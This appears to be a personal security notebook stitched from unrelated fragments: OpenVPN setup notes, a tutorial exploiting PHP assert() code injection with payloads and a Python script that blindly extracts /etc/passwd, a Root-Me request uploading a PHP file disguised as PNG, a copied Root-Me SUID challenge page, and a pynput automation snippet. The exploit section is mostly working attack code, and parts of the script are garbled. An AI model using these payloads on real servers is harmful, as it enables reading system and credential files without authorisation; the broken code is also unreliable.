schema relais

marche bien , modifs faites:
adresse de port changée cf : /etc/openvpn/server.conf
cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 /etc/openvpn/easy-rsa DEVIENT AVEC LES VERSION RECENTES DE DEBIAN cp -R /usr/share/easy-rsa/* /etc/openvpn/easy-rsa/
dh1024.pem DEVIENT dh2048.pem

PHP assert() Vulnerable to Local File Inclusion

Consider following url
http://example.com/inex.php/?page=home

The first thing I see when entering the site, that comes to mind is a LFI attack with “?page=” parameter. Now we should try input to some file we know like “index.php”, “/etc/passwd” to test this vulnerability.

http://example.com/inex.php/?page=../../../../../etc/passwd

Application Reply with message “Warning: assert(): Assertion “strpos(‘includes/’, ‘qwer’) === false && strlen(file_get_contents(“.passwd”)) == 0 && strpos(‘1.php’, ‘..’) === false” failed in /var/www/html/index.php on line 8”

-> This application using assert() function to do checks if assertion is FALSE.

The php code using by application like following:

<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "includes/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // vulnerable code!

?

Let try inject some malicious code to read file’s contents by using blind technique.

http://example.com/inex.php/?page=’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1

-> Server response with a message like “Warning: assert(): Assertion “strpos(‘includes/’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1.php’, ‘..’) === false” failed in /var/www/html/index.php on line 8” when the condition is FALSE

http://example.com/inex.php//?page=’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) >0 && strpos(‘1

-> Server response with a message like “File does not exist” when the condition is TRUE

Server ruturn warning with message “Detected hacking attempt!” when condition is FALSE, and “File does not exist” if condition is TRUE

The python script to read file’s contents:

import base64
import string
import requests
import urllib

url = "http://example.com/index.php/"

def check(payload):
params = urllib.urlencode({'page': payload})
r = requests.get(url, params=params)
return "Warning" not in r.text

base = "/', 'qwer') === false && %s && strpos(/'1"

def get_len(path):
i = 10
while True:
payload = 'strlen(file_get_contents("%s")) <? %d' % (path, i)
if check(base % s):
for j in range(i-10, i):
payload = 'strlen(file_get_contents("%s")) == %d' % (path, j)
if check(base % payload):
print "Found Length = %d" % j
return j
i += 10

def read_file_contents(path):
length = get_len(path)
s = ""
while len(s) <? length:
for c in string.printable:
tmp = s + c
payload = 'substr(file_get_contents("%s"), 0, %d) == base64_decode("%s")' % (
path, len(tmp), base64.b64encode(tmp))

        if check(base % payload):
            s += c
print s

print read_file_contents('../../../../../../etc/passwd')

With this vulnerability, you can read all directories and files in target server, first thing you should blind directory by using following code implode(” “, scandir(‘path_to_directory’)), this code implement to read directory and convert to string by implode() function.

outils en ligne pour faire tout un tas de manipuluation ! (chaînes: checksums, base64, compression, url-encode/decode...; chiffrement, ...).

cheatsheet

r2 = requests.post("http://challenge01.root-me.org/web-serveur/ch20/?action=upload", files= {'file' : ('test4.php.png', open('/home/lubuntu/Images/code.php', 'rb'),'image/png')})

OWASP

http://challenge01.root-me.org/forensic/ch2/ch2.tbz2

Code source :

#include <stdlib.h>
#include <stdio.h>

/* gcc -m32 -o ch11 ch11.c */

int main(void)
{
        system("ls /challenge/app-script/ch11/.passwd");
        return 0;
}

Télécharger

Paramètres de connexion au challenge :
Hôte
challenge02.root-me.org
Protocole
SSH
Port
2222
Accès SSH
ssh -p 2222 app-script-ch11@challenge02.root-me.org WebSSH
Nom d'utilisateur
app-script-ch11
Mot de passe
app-script-ch11
Démarrer le challenge
Validation

Entrer le mot de passe :
2 ressource(s) associée(s)

EN Dangers of SUID Shell Scripts (Administration/Unix)
EN SUID Privileged Programs (Administration/Unix)

Obtenir de l'aide

Vous êtes bloqué(e) dans une épreuve ? Demandez de l'aide dans la section App - Script du forum ou sur le canal IRC
Solution 10 Solutions
Voir les solutions Proposer une solution
Résultats des challenges Résultats des challenges
Pseudonyme
Epreuve
Langue
Date
Neofix
Bash - System 1
fr
18 janvier 2019 à 14:32
vheart
Bash - System 1
en
18 janvier 2019 à 14:30
Mamar
Bash - System 1
fr
18 janvier 2019 à 14:29
RodhaT35
Bash - System 1
fr
18 janvier 2019 à 10:24
dddong
Bash - System 1
en
18 janvier 2019 à 04:21
MagicWarthog
Bash - System 1
en
18 janvier 2019 à 02:03
mathgl
Bash - System 1
en
18 janvier 2019 à 01:48
Satarno
Bash - System 1
en
18 janvier 2019 à 00:06
Root358
Bash - System 1
fr
17 janvier 2019 à 23:31
Scrayn
Bash - System 1
fr
17 janvier 2019 à 23:24

0
10
20
30
40
50
60
70
80
...

Challenges publiés dans cette rubrique 15 Challenges
Résultats Nom de l'épreuve Validations Nombre de points Explications sur les scores Note Notation
pas_valide Bash - System 1 16% 17350 5
pas_valide sudo - faiblesse de configuration 11% 11705 5
pas_valide Bash - System 2 10% 10921 10
pas_valide Perl - Command injection 5% 5414 15
pas_valide Bash - cron 5% 5536 20
pas_valide Python - input() 7% 7139 20
pas_valide Python - pickle 3% 2317 25
pas_valide SSH Agent Hijacking 1% 347 30
pas_valide Python - PyJail 1 3% 3026 35
pas_valide Bash/Awk - parsing netstat 1% 164 40
pas_valide Python - PyJail 2 2% 1599 40
pas_valide Python - Jail - Exec 1% 669 50
pas_valide Javascript - Jail 1% 163 55
pas_valide Python - Jail - Garbage collector 1% 174 55
pas_valide Shells restreints 1% 965 70
© 2010 - 2019
Root Me : plateforme d’apprentissage dédiée au Hacking et à la Sécurité de l’Information

from pynput.mouse import Button, Controller as Controller1
from pynput.keyboard import Key, Controller as Controller2
import time
mouse = Controller1()
mouse.position = (1200, 700)

mouse.press(Button.right)
mouse.release(Button.right)

mouse.position = (1250, 780)

time.sleep(0.1)

mouse.press(Button.left)
mouse.release(Button.left)

keyboard = Controller2()
time.sleep(1)
keyboard.press(Key.enter)
keyboard.release(Key.enter)